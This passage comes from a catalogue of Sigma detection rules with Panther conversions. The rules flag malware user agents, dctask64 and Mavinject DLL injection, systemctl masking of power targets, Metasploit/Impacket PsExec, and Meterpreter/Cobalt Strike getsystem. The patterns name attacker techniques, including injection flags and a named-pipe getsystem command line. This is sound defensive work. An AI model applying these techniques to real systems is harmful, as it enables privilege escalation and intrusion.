    category: process_access
    product: windows
    definition: 'Requirements: The following config is required to generate the necessary Event ID 10 Process Access events: <ProcessAccess onmatch="include"><CallTrace condition="contains">VBE7.DLL</CallTrace></ProcessAccess><ProcessAccess onmatch="exclude"><CallTrace condition="excludes">UNKNOWN</CallTrace></ProcessAccess>'
detection:
    selection_target:
        TargetImage|endswith: '\verclsid.exe'
        GrantedAccess: '0x1FFFFF'
    selection_calltrace_1:
        CallTrace|contains|all:
            - '|UNKNOWN('
            - 'VBE7.DLL'
    selection_calltrace_2:
        SourceImage|contains: '\Microsoft Office\'
        CallTrace|contains: '|UNKNOWN'
    condition: selection_target and 1 of selection_calltrace_*
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

Malware User Agent

Detects suspicious user agent strings used by malware in proxy logs

status test author Florian Roth (Nextron Systems), X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) id 5c84856b-55a5-45f1-826f-13f37250cf4e

panther query

def rule(event):
    if any(
        [
            event.deep_get("c-useragent", default="")
            == "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Chrome /53.0",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR  1.1.4322)",
            event.deep_get("c-useragent", default="") == "HttpBrowser/1.0",
            "<|>" in event.deep_get("c-useragent", default=""),
            event.deep_get("c-useragent", default="") == "nsis_inetc (mozilla)",
            event.deep_get("c-useragent", default="") == "Wget/1.9+cvs-stable (Red Hat modified)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)",
            "zeroup" in event.deep_get("c-useragent", default=""),
            event.deep_get("c-useragent", default="").startswith(
                "Mozilla/5.0 (Windows NT 5.1 ; v."
            ),
            " adlib/" in event.deep_get("c-useragent", default=""),
            event.deep_get("c-useragent", default="").endswith(" tiny"),
            " BGroom " in event.deep_get("c-useragent", default=""),
            event.deep_get("c-useragent", default="").endswith(" changhuatong"),
            event.deep_get("c-useragent", default="").endswith(" CholTBAgent"),
            event.deep_get("c-useragent", default="") == "Mozilla/5.0 WinInet",
            event.deep_get("c-useragent", default="") == "RookIE/1.0",
            event.deep_get("c-useragent", default="") == "M",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible;MSIE 7.0;Windows NT 6.0)",
            event.deep_get("c-useragent", default="") == "backdoorbot",
            event.deep_get("c-useragent", default="")
            == "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)",
            event.deep_get("c-useragent", default="") == "Opera/8.81 (Windows NT 6.0; U; en)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30729)",
            event.deep_get("c-useragent", default="") == "Opera",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)",
            event.deep_get("c-useragent", default="") == "MSIE",
            event.deep_get("c-useragent", default="").endswith("(Charon; Inferno)"),
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; InfoPath.3)",
            event.deep_get("c-useragent", default="") == "Mozilla/5.0 (Windows NT 6.1)",
            event.deep_get("c-useragent", default="") == "AppleWebkit/587.38 (KHTML, like Gecko)",
            event.deep_get("c-useragent", default="") == "Chrome/91.0.4472.77",
            event.deep_get("c-useragent", default="") == "Safari/537.36",
            event.deep_get("c-useragent", default="") == "Edge/91.0.864.37",
            event.deep_get("c-useragent", default="") == "Firefox/89.0",
            event.deep_get("c-useragent", default="") == "Gecko/20100101",
            " pxyscand" in event.deep_get("c-useragent", default=""),
            event.deep_get("c-useragent", default="").endswith(" asd"),
            event.deep_get("c-useragent", default="").endswith(" mdms"),
            event.deep_get("c-useragent", default="") == "sample",
            event.deep_get("c-useragent", default="") == "nocase",
            event.deep_get("c-useragent", default="") == "Moxilla",
            event.deep_get("c-useragent", default="").startswith("Win32 "),
            "Microsoft Internet Explorer" in event.deep_get("c-useragent", default=""),
            event.deep_get("c-useragent", default="").startswith("agent "),
            event.deep_get("c-useragent", default="") == "AutoIt",
            event.deep_get("c-useragent", default="") == "IczelionDownLoad",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; Tablet PC 2.0)",
            event.deep_get("c-useragent", default="") == "record",
            event.deep_get("c-useragent", default="") == "mozzzzzzzzzzz",
            event.deep_get("c-useragent", default="")
            == "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
            event.deep_get("c-useragent", default="") == "Havana/0.1",
            event.deep_get("c-useragent", default="") == "antSword/v2.1",
            event.deep_get("c-useragent", default="") == "rqwrwqrqwrqw",
            event.deep_get("c-useragent", default="") == "qwrqrwrqwrqwr",
            event.deep_get("c-useragent", default="") == "rc2.0/client",
            event.deep_get("c-useragent", default="") == "TakeMyPainBack",
            event.deep_get("c-useragent", default="") == "xxx",
            event.deep_get("c-useragent", default="") == "20112211",
            event.deep_get("c-useragent", default="") == "23591",
            event.deep_get("c-useragent", default="") == "901785252112",
            event.deep_get("c-useragent", default="") == "1235125521512",
            event.deep_get("c-useragent", default="") == "125122112551",
            event.deep_get("c-useragent", default="") == "B1D3N_RIM_MY_ASS",
            event.deep_get("c-useragent", default="") == "AYAYAYAY1337",
            event.deep_get("c-useragent", default="") == "iMightJustPayMySelfForAFeature",
            event.deep_get("c-useragent", default="") == "ForAFeature",
            event.deep_get("c-useragent", default="").startswith("Ares_ldr_v_"),
            event.deep_get("c-useragent", default="") == "Microsoft Internet Explorer",
            event.deep_get("c-useragent", default="") == "CLCTR",
            event.deep_get("c-useragent", default="") == "uploader",
            event.deep_get("c-useragent", default="") == "agent",
            event.deep_get("c-useragent", default="") == "License",
            event.deep_get("c-useragent", default="") == "vb wininet",
            event.deep_get("c-useragent", default="") == "Client",
            event.deep_get("c-useragent", default="") == "Lilith-Bot/3.0",
            event.deep_get("c-useragent", default="") == "svc/1.0",
            event.deep_get("c-useragent", default="") == "WSHRAT",
            event.deep_get("c-useragent", default="") == "ZeroStresser Botnet/1.5",
            event.deep_get("c-useragent", default="") == "OK",
            event.deep_get("c-useragent", default="") == "Project1sqlite",
            event.deep_get("c-useragent", default="") == "Project1",
            event.deep_get("c-useragent", default="") == "DuckTales",
            event.deep_get("c-useragent", default="") == "Zadanie",
            event.deep_get("c-useragent", default="") == "GunnaWunnaBlueTips",
            event.deep_get("c-useragent", default="") == "Xlmst",
            event.deep_get("c-useragent", default="") == "GeekingToTheMoon",
            event.deep_get("c-useragent", default="") == "SunShineMoonLight",
            event.deep_get("c-useragent", default="") == "BunnyRequester",
            event.deep_get("c-useragent", default="") == "BunnyTasks",
            event.deep_get("c-useragent", default="") == "BunnyStealer",
            event.deep_get("c-useragent", default="") == "BunnyLoader_Dropper",
            event.deep_get("c-useragent", default="") == "BunnyLoader",
            event.deep_get("c-useragent", default="") == "BunnyShell",
            event.deep_get("c-useragent", default="") == "SPARK-COMMIT",
            event.deep_get("c-useragent", default="") == "4B4DB4B3",
            event.deep_get("c-useragent", default="") == "SouthSide",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)",
        ]
    ):
        return True
    return False

view Sigma YAML

title: Malware User Agent
id: 5c84856b-55a5-45f1-826f-13f37250cf4e
status: test
description: Detects suspicious user agent strings used by malware in proxy logs
references:
    - http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules
    - http://www.botopedia.org/search?searchword=scan&searchphrase=all
    - https://networkraptor.blogspot.com/2015/01/user-agent-strings.html
    - https://perishablepress.com/blacklist/ua-2013.txt
    - https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents
    - https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q
    - https://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large
    - https://twitter.com/crep1x/status/1635034100213112833
author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2017-07-08
modified: 2024-04-14
tags:
    - attack.command-and-control
    - attack.t1071.001
logsource:
    category: proxy
detection:
    selection:
        c-useragent:
            # RATs
            - 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Chrome /53.0' # DragonOK
            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)' # Used by PlugX - base-lining recommended - https://community.rsa.com/thread/185439
            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)' # Used by PlugX - base-lining recommended - https://community.rsa.com/thread/185439
            - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR  1.1.4322)' # Used by PlugX - old - https://unit42.paloaltonetworks.com/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/
            - 'HttpBrowser/1.0' # HTTPBrowser RAT
            - '*<|>*' # Houdini / Iniduoh / njRAT
            - 'nsis_inetc (mozilla)' # ZeroAccess
            - 'Wget/1.9+cvs-stable (Red Hat modified)' # Dyre / Upatre
            # Ghost419 https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/
            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)'
            # Malware
            - '*zeroup*' # W32/Renos.Downloader
            - 'Mozilla/5.0 (Windows NT 5.1 ; v.*' # Kazy
            - '* adlib/*'
            - '* tiny' # Trojan Downloader
            - '* BGroom *' # Trojan Downloader
            - '* changhuatong'
            - '* CholTBAgent'
            - 'Mozilla/5.0 WinInet'
            - 'RookIE/1.0'
            - 'M' # HkMain
            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)' # Egamipload - old UA - probable prone to false positives
            - 'Mozilla/4.0 (compatible;MSIE 7.0;Windows NT 6.0)' # Yakes
            - 'backdoorbot'
            - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)' # Sality
            - 'Opera/8.81 (Windows NT 6.0; U; en)' # Sality
            - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30729)' # Sality
            - 'Opera' # Trojan Keragany
            - 'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)' # Fareit
            - 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)' # Webshell's back connect
            - 'MSIE' # Toby web shell
            - '*(Charon; Inferno)' # Loki Bot
            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)' # Fareit / Pony
            - 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' # https://www.virustotal.com/gui/file/8abbef8e58f012d45a7cb46c3c2729dcd33cf53e721ff8c59e238862aa0a9e0e/detection
            - 'Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)' # MacControl malware https://www.virustotal.com/gui/file/d60f61f1f03a5011a0240694e110c6d370bf68a92753093186c6d14e26a15428/detection https://www.symantec.com/connect/blogs/osxmacontrol-back-it-again
            - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' # used by Zebrocy malware https://app.any.run/tasks/7d7fa4a0-6970-4428-828b-29572abf9ceb/
            # Ursnif
            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)'
            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)'
            # Emotet
            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; InfoPath.3)' # https://twitter.com/webbthewombat/status/1225827092132179968
            # Lockbit (https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q)
            - 'Mozilla/5.0 (Windows NT 6.1)'
            - 'AppleWebkit/587.38 (KHTML, like Gecko)'
            - 'Chrome/91.0.4472.77'
            - 'Safari/537.36'
            - 'Edge/91.0.864.37'
            - 'Firefox/89.0'
            - 'Gecko/20100101'
            # Others
            - '* pxyscand*'
            - '* asd'
            - '* mdms'
            - 'sample'
            - 'nocase'
            - 'Moxilla'
            - 'Win32 *'
            - '*Microsoft Internet Explorer*'
            - 'agent *'
            - 'AutoIt' # Suspicious - base-lining recommended
            - 'IczelionDownLoad'
            - 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; Tablet PC 2.0)' # https://unit42.paloaltonetworks.com/thor-plugx-variant/
            - 'record' # https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/
            - 'mozzzzzzzzzzz' # https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/
            - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0' # Quasar RAT UA https://twitter.com/malmoeb/status/1559994820692672519?s=20&t=g3tkNL09dZZWbFN10qDVjg
            - 'Havana/0.1' # https://www.cybereason.com/blog/threat-alert-havanacrypt-ransomware-masquerading-as-google-update
            - 'antSword/v2.1' # AntSword Webshell UA
            - 'rqwrwqrqwrqw'  # Racoon Stealer
            - 'qwrqrwrqwrqwr'  # Racoon Stealer
            - 'rc2.0/client'  # Racoon Stealer
            - 'TakeMyPainBack'  # Racoon Stealer
            - 'xxx' # Racoon Stealer
            - '20112211' # Racoon Stealer
            - '23591' # Racoon Stealer
            - '901785252112' # Racoon Stealer
            - '1235125521512' # Racoon Stealer
            - '125122112551' # Racoon Stealer
            - 'B1D3N_RIM_MY_ASS' # Racoon Stealer
            - 'AYAYAYAY1337' # Racoon Stealer
            - 'iMightJustPayMySelfForAFeature' # Racoon Stealer
            - 'ForAFeature' # Racoon Stealer
            - 'Ares_ldr_v_*' # AresLoader
            # - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106' # seen used by AresLoader
            - 'Microsoft Internet Explorer' # https://github.com/silence-is-best/c2db
            - 'CLCTR' # https://github.com/silence-is-best/c2db
            - 'uploader' # https://github.com/silence-is-best/c2db
            - 'agent' # https://github.com/silence-is-best/c2db
            - 'License' # https://github.com/silence-is-best/c2db
            - 'vb wininet' # https://github.com/silence-is-best/c2db
            - 'Client' # https://github.com/silence-is-best/c2db
            - 'Lilith-Bot/3.0' # Lilith Stealer - https://twitter.com/suyog41/status/1558051450797690880
            - 'svc/1.0' # SVC Loader - https://twitter.com/suyog41/status/1558051450797690880
            - 'WSHRAT' # WSHRAT - https://twitter.com/suyog41/status/1558051450797690880
            - 'ZeroStresser Botnet/1.5' # Zerobot - https://twitter.com/suyog41/status/1558051450797690880
            - 'OK' # Nymaim - https://twitter.com/suyog41/status/1558051450797690880
            - 'Project1sqlite' # DarkCloud - https://twitter.com/suyog41/status/1558051450797690880
            - 'Project1' # DarkCloud - https://twitter.com/suyog41/status/1558051450797690880
            - 'DuckTales' # Racoon Stealer
            - 'Zadanie' # Racoon Stealer
            - 'GunnaWunnaBlueTips' # Racoon Stealer
            - 'Xlmst' # Racoon Stealer
            - 'GeekingToTheMoon' # Racoon Stealer
            - 'SunShineMoonLight' # Racoon Stealer
            - 'BunnyRequester' # BunnyStealer
            - 'BunnyTasks' # BunnyStealer
            - 'BunnyStealer' # BunnyStealer
            - 'BunnyLoader_Dropper' # BunnyStealer
            - 'BunnyLoader' # BunnyStealer
            - 'BunnyShell' # BunnyStealer
            - 'SPARK-COMMIT' # SparkRAT - https://arcticwolf.com/resources/blog/tellmethetruth-exploitation-of-cve-2023-46604-leading-to-ransomware/
            - '4B4DB4B3' # B4B3RAT - https://twitter.com/naumovax/status/1718956514491130301
            - 'SouthSide' # Racoon Stealer
            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)' # Latrodectus loader
    condition: selection
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

ManageEngine Endpoint Central Dctask64.EXE Potential Abuse

Detects the execution of "dctask64.exe", a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.

status test author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) id 6345b048-8441-43a7-9bed-541133633d7a

panther query

def rule(event):
    if all(
        [
            any(
                [
                    event.deep_get("Image", default="").endswith("\\dctask64.exe"),
                    any(
                        [
                            "IMPHASH=6834B1B94E49701D77CCB3C0895E1AFD"
                            in event.deep_get("Hashes", default=""),
                            "IMPHASH=1BB6F93B129F398C7C4A76BB97450BBA"
                            in event.deep_get("Hashes", default=""),
                            "IMPHASH=FAA2AC19875FADE461C8D89DCF2710A3"
                            in event.deep_get("Hashes", default=""),
                            "IMPHASH=F1039CED4B91572AB7847D26032E6BBF"
                            in event.deep_get("Hashes", default=""),
                        ]
                    ),
                ]
            ),
            any(
                [
                    " executecmd64 " in event.deep_get("CommandLine", default=""),
                    " invokeexe " in event.deep_get("CommandLine", default=""),
                    " injectDll " in event.deep_get("CommandLine", default=""),
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: ManageEngine Endpoint Central Dctask64.EXE Potential Abuse
id: 6345b048-8441-43a7-9bed-541133633d7a
status: test
description: |
    Detects the execution of "dctask64.exe", a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central.
    This binary can be abused for DLL injection, arbitrary command and process execution.
references:
    - https://twitter.com/gN3mes1s/status/1222088214581825540
    - https://twitter.com/gN3mes1s/status/1222095963789111296
    - https://twitter.com/gN3mes1s/status/1222095371175911424
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2020-01-28
modified: 2025-01-22
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\dctask64.exe'
        - Hashes|contains:
              - 'IMPHASH=6834B1B94E49701D77CCB3C0895E1AFD'
              - 'IMPHASH=1BB6F93B129F398C7C4A76BB97450BBA'
              - 'IMPHASH=FAA2AC19875FADE461C8D89DCF2710A3'
              - 'IMPHASH=F1039CED4B91572AB7847D26032E6BBF'
    selection_cli:
        CommandLine|contains:
            - ' executecmd64 '
            - ' invokeexe '
            - ' injectDll '
    condition: all of selection_*
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

Mask System Power Settings Via Systemctl

Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep. Adversaries may mask these targets to prevent a system from entering sleep or shutdown states, ensuring their malicious processes remain active and uninterrupted. This behavior can be associated with persistence or defense evasion, as it impairs normal system power operations to maintain long-term access or avoid termination of malicious activity.

status experimental author Milad Cheraghi, Nasreddine Bencherchali id c172b7b5-f3a1-4af2-90b7-822c63df86cb

panther query

def rule(event):
    if all(
        [
            event.deep_get("Image", default="").endswith("/systemctl"),
            " mask" in event.deep_get("CommandLine", default=""),
            any(
                [
                    "suspend.target" in event.deep_get("CommandLine", default=""),
                    "hibernate.target" in event.deep_get("CommandLine", default=""),
                    "hybrid-sleep.target" in event.deep_get("CommandLine", default=""),
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Mask System Power Settings Via Systemctl
id: c172b7b5-f3a1-4af2-90b7-822c63df86cb
status: experimental
description: |
    Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep.
    Adversaries may mask these targets to prevent a system from entering sleep or shutdown states, ensuring their malicious processes remain active and uninterrupted.
    This behavior can be associated with persistence or defense evasion, as it impairs normal system power operations to maintain long-term access or avoid termination of malicious activity.
author: Milad Cheraghi, Nasreddine Bencherchali
date: 2025-10-17
references:
    - https://www.man7.org/linux/man-pages/man1/systemctl.1.html
    - https://linux-audit.com/systemd/faq/what-is-the-difference-between-systemctl-disable-and-systemctl-mask/
tags:
    - attack.persistence
    - attack.impact
    - attack.t1653
logsource:
    category: process_creation
    product: linux
detection:
    selection_systemctl:
        Image|endswith: '/systemctl'
        CommandLine|contains: ' mask'
    selection_power_options:
        CommandLine|contains:
            - 'suspend.target'
            - 'hibernate.target'
            - 'hybrid-sleep.target'
    condition: all of selection_*
falsepositives:
    - Unlikely
level: high

Convert to SIEM query

high

Mavinject Inject DLL Into Running Process

Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag

status test author frack113, Florian Roth id 4f73421b-5a0b-4bbf-a892-5a7fb99bea66

panther query

def rule(event):
    if all(
        [
            " /INJECTRUNNING " in event.deep_get("CommandLine", default=""),
            not event.deep_get("ParentImage", default="")
            == "C:\\Windows\\System32\\AppVClient.exe",
        ]
    ):
        return True
    return False

view Sigma YAML

title: Mavinject Inject DLL Into Running Process
id: 4f73421b-5a0b-4bbf-a892-5a7fb99bea66
related:
    - id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8
      type: obsolete
status: test
description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md
    - https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e
    - https://twitter.com/gN3mes1s/status/941315826107510784
    - https://reaqta.com/2017/12/mavinject-microsoft-injector/
    - https://twitter.com/Hexacorn/status/776122138063409152  # Deleted tweet
    - https://github.com/SigmaHQ/sigma/issues/3742
    - https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection
author: frack113, Florian Roth
date: 2021-07-12
modified: 2022-12-05
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055.001
    - attack.t1218.013
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains: ' /INJECTRUNNING '
    filter:
        ParentImage: 'C:\Windows\System32\AppVClient.exe' # This parent is the expected process to launch "mavinject"
    condition: selection and not filter
falsepositives:
    - Unknown
level: high

Convert to SIEM query

high

Metasploit Or Impacket Service Installation Via SMB PsExec

Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation

status test author Bartlomiej Czyz, Relativity id 6fb63b40-e02a-403e-9ffd-3bcc1d749442

panther query

import re


def rule(event):
    if all(
        [
            event.deep_get("EventID", default="") == 4697,
            re.match(
                r"^%systemroot%\\\\[a-zA-Z]{8}\\.exe$",
                event.deep_get("ServiceFileName", default=""),
            ),
            re.match(
                r"(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)",
                event.deep_get("ServiceName", default=""),
            ),
            event.deep_get("ServiceStartType", default="") == 3,
            event.deep_get("ServiceType", default="") == "0x10",
            not event.deep_get("ServiceName", default="") == "PSEXESVC",
        ]
    ):
        return True
    return False

view Sigma YAML

title: Metasploit Or Impacket Service Installation Via SMB PsExec
id: 6fb63b40-e02a-403e-9ffd-3bcc1d749442
related:
    - id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0
      type: derived
status: test
description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation
references:
    - https://bczyz1.github.io/2021/01/30/psexec.html
author: Bartlomiej Czyz, Relativity
date: 2021-01-21
modified: 2022-10-05
tags:
    - attack.lateral-movement
    - attack.t1021.002
    - attack.t1570
    - attack.execution
    - attack.t1569.002
logsource:
    product: windows
    service: security
    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697
detection:
    selection:
        EventID: 4697
        ServiceFileName|re: '^%systemroot%\\[a-zA-Z]{8}\.exe$'
        ServiceName|re: '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)'
        ServiceStartType: 3  # on-demand start, see https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4697
        ServiceType: '0x10'
    filter:
        ServiceName: 'PSEXESVC'
    condition: selection and not filter
falsepositives:
    - Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name
level: high

Convert to SIEM query

high

Metasploit SMB Authentication

Alerts on Metasploit host's authentications on the domain.

status test author Chakib Gzenayi (@Chak092), Hosni Mribah id 72124974-a68b-4366-b990-d30e0b2a190d

panther query

import re


def rule(event):
    if any(
        [
            all(
                [
                    event.deep_get("EventID", default="") in [4625, 4624],
                    event.deep_get("LogonType", default="") == 3,
                    event.deep_get("AuthenticationPackageName", default="") == "NTLM",
                    re.match(r"^[A-Za-z0-9]{16}$", event.deep_get("WorkstationName", default="")),
                ]
            ),
            all(
                [
                    event.deep_get("EventID", default="") == 4776,
                    re.match(r"^[A-Za-z0-9]{16}$", event.deep_get("Workstation", default="")),
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Metasploit SMB Authentication
id: 72124974-a68b-4366-b990-d30e0b2a190d
status: test
description: Alerts on Metasploit host's authentications on the domain.
references:
    - https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb
author: Chakib Gzenayi (@Chak092), Hosni Mribah
date: 2020-05-06
modified: 2024-01-25
tags:
    - attack.lateral-movement
    - attack.t1021.002
logsource:
    product: windows
    service: security
detection:
    selection1:
        EventID:
            - 4625
            - 4624
        LogonType: 3
        AuthenticationPackageName: 'NTLM'
        WorkstationName|re: '^[A-Za-z0-9]{16}$'
    selection2:
        EventID: 4776
        Workstation|re: '^[A-Za-z0-9]{16}$'
    condition: 1 of selection*
falsepositives:
    - Linux hostnames composed of 16 characters.
level: high

Convert to SIEM query

high

Meterpreter or Cobalt Strike Getsystem Service Installation - Security

Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation

status test author Teymur Kheirkhabarov, Ecco, Florian Roth (Nextron Systems) id ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34

panther query

def rule(event):
    if all(
        [
            event.deep_get("EventID", default="") == 4697,
            any(
                [
                    all(
                        [
                            "/c" in event.deep_get("ServiceFileName", default=""),
                            "echo" in event.deep_get("ServiceFileName", default=""),
                            "\\pipe\\" in event.deep_get("ServiceFileName", default=""),
                            any(
                                [
                                    "cmd" in event.deep_get("ServiceFileName", default=""),
                                    "%COMSPEC%" in event.deep_get("ServiceFileName", default=""),
                                ]
                            ),
                        ]
                    ),
                    all(
                        [
                            "rundll32" in event.deep_get("ServiceFileName", default=""),
                            ".dll,a" in event.deep_get("ServiceFileName", default=""),
                            "/p:" in event.deep_get("ServiceFileName", default=""),
                        ]
                    ),
                    event.deep_get("ServiceFileName", default="").startswith(
                        "\\\\127.0.0.1\\ADMIN$\\"
                    ),
                ]
            ),
        ]
    ):
        return True
    return False

view Sigma YAML

title: Meterpreter or Cobalt Strike Getsystem Service Installation - Security
id: ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34
related:
    - id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6
      type: derived
status: test
description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation
references:
    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment
    - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
author: Teymur Kheirkhabarov, Ecco, Florian Roth (Nextron Systems)
date: 2019-10-26
modified: 2023-11-15
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1134.001
    - attack.t1134.002
logsource:
    product: windows
    service: security
    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697
detection:
    selection_eid:
        EventID: 4697
    selection_cli_cmd:
        # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a
        # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a
